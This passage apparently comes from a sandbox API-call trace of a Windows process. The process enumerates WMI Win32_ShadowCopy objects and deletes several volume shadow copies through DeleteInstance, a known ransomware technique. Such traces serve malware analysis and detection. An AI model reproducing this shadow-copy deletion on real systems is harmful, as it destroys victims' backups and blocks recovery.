lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0132.188] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0132.188] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0132.188] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0132.188] IWbemClassObject:Get (in: This=0x1be576c0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0132.188] SysStringLen (param_1="root\\cimv2") returned 0xa [0132.188] IWbemClassObject:Get (in: This=0x1be576c0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0132.188] SysStringLen (param_1="root\\cimv2") returned 0xa [0132.188] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0132.188] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0132.188] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0132.188] IWbemClassObject:Get (in: This=0x1be576c0, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0132.188] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0132.188] IWbemClassObject:Get (in: This=0x1be576c0, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0132.188] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0132.189] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be52f50, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0132.189] WbemDefPath:IWbemPath:GetText (in: This=0x1be52f50, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0132.189] WbemDefPath:IWbemPath:GetText (in: This=0x1be52f50, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"") returned 0x0 [0132.189] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0132.189] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0132.189] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0132.189] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0132.189] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0132.189] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0132.189] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0132.189] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0132.189] IWbemClassObject:Get (in: This=0x1be576c0, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0132.190] WbemDefPath:IWbemPath:GetText (in: This=0x1be52f50, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0132.190] WbemDefPath:IWbemPath:GetText (in: This=0x1be52f50, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"") returned 0x0 [0132.190] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0134.040] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0134.040] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be57d70, puReturned=0x1c90de18*=0x1) returned 0x0 [0134.041] IUnknown:QueryInterface (in: This=0x1be57d70, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be57d70) returned 0x0 [0134.042] IUnknown:QueryInterface (in: This=0x1be57d70, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0134.042] IUnknown:QueryInterface (in: This=0x1be57d70, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0134.042] IUnknown:AddRef (This=0x1be57d70) returned 0x3 [0134.042] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0134.042] IUnknown:QueryInterface (in: This=0x1be57d70, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be57d78) returned 0x0 [0134.042] IMarshal:GetUnmarshalClass (in: This=0x1be57d78, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0134.042] IUnknown:Release (This=0x1be57d78) returned 0x3 [0134.043] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0134.043] IUnknown:AddRef (This=0x1be57d70) returned 0x4 [0134.043] IUnknown:QueryInterface (in: This=0x1be57d70, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0134.043] IUnknown:Release (This=0x1be57d70) returned 0x3 [0134.043] IUnknown:Release (This=0x1be57d70) returned 0x2 [0134.043] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0134.043] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0134.043] IUnknown:AddRef (This=0x1be57d70) returned 0x3 [0134.043] IUnknown:QueryInterface (in: This=0x1be57d70, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be57d70) returned 0x0 [0134.043] IUnknown:Release (This=0x1be57d70) returned 0x3 [0134.044] IUnknown:Release (This=0x1be57d70) returned 0x2 [0134.044] IUnknown:Release (This=0x1be57d70) returned 0x1 [0134.044] CoTaskMemFree (pv=0x16a900) [0134.044] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0134.044] IUnknown:AddRef (This=0x1be57d70) returned 0x2 [0134.044] IWbemClassObject:Get (in: This=0x1be57d70, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0134.044] IWbemClassObject:Get (in: This=0x1be57d70, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0134.044] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"") returned 0x53 [0134.044] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0134.044] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0134.044] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0134.045] IUnknown:Release (This=0x142498) returned 0x1 [0134.045] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be52220) returned 0x0 [0134.045] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52220, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0134.046] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be52220, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be53010) returned 0x0 [0134.046] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53010, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be53010) returned 0x0 [0134.046] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53010, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0134.046] WbemDefPath:IUnknown:AddRef (This=0x1be53010) returned 0x3 [0134.046] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0134.046] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53010, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b936ee0) returned 0x0 [0134.046] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b936ee0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0134.046] WbemDefPath:IUnknown:Release (This=0x1b936ee0) returned 0x3 [0134.046] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0134.046] WbemDefPath:IUnknown:AddRef (This=0x1be53010) returned 0x4 [0134.047] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53010, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0134.047] WbemDefPath:IUnknown:Release (This=0x1be53010) returned 0x3 [0134.047] WbemDefPath:IUnknown:Release (This=0x1be53010) returned 0x2 [0134.047] WbemDefPath:IUnknown:Release (This=0x1be52220) returned 0x0 [0134.047] WbemDefPath:IUnknown:Release (This=0x1be53010) returned 0x1 [0134.047] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0134.047] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0134.047] WbemDefPath:IUnknown:AddRef (This=0x1be53010) returned 0x2 [0134.047] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53010, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be53010) returned 0x0 [0134.047] WbemDefPath:IUnknown:Release (This=0x1be53010) returned 0x2 [0134.048] WbemDefPath:IUnknown:Release (This=0x1be53010) returned 0x1 [0134.048] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0134.048] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0134.048] WbemDefPath:IUnknown:AddRef (This=0x1be53010) returned 0x2 [0134.048] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53010, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be53010) returned 0x0 [0134.048] WbemDefPath:IUnknown:Release (This=0x1be53010) returned 0x2 [0134.048] WbemDefPath:IUnknown:AddRef (This=0x1be53010) returned 0x3 [0134.048] WbemDefPath:IWbemPath:SetText (This=0x1be53010, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"") returned 0x0 [0134.048] WbemDefPath:IUnknown:Release (This=0x1be53010) returned 0x2 [0134.048] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0134.048] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0134.048] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0134.048] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0134.049] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0134.049] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0134.049] IWbemClassObject:Get (in: This=0x1be57d70, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0134.049] SysStringLen (param_1="root\\cimv2") returned 0xa [0134.049] IWbemClassObject:Get (in: This=0x1be57d70, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0134.049] SysStringLen (param_1="root\\cimv2") returned 0xa [0134.049] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0134.049] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0134.049] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0134.049] IWbemClassObject:Get (in: This=0x1be57d70, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0134.049] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0134.049] IWbemClassObject:Get (in: This=0x1be57d70, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0134.049] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0134.050] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be53010, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0134.050] WbemDefPath:IWbemPath:GetText (in: This=0x1be53010, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0134.050] WbemDefPath:IWbemPath:GetText (in: This=0x1be53010, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"") returned 0x0 [0134.050] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0134.050] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0134.050] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0134.050] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0134.050] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0134.050] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0134.050] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0134.050] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0134.050] IWbemClassObject:Get (in: This=0x1be57d70, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0134.051] WbemDefPath:IWbemPath:GetText (in: This=0x1be53010, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0134.051] WbemDefPath:IWbemPath:GetText (in: This=0x1be53010, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"") returned 0x0 [0134.051] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0135.500] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0135.500] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be58420, puReturned=0x1c90de18*=0x1) returned 0x0 [0135.501] IUnknown:QueryInterface (in: This=0x1be58420, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be58420) returned 0x0 [0135.501] IUnknown:QueryInterface (in: This=0x1be58420, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0135.501] IUnknown:QueryInterface (in: This=0x1be58420, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, 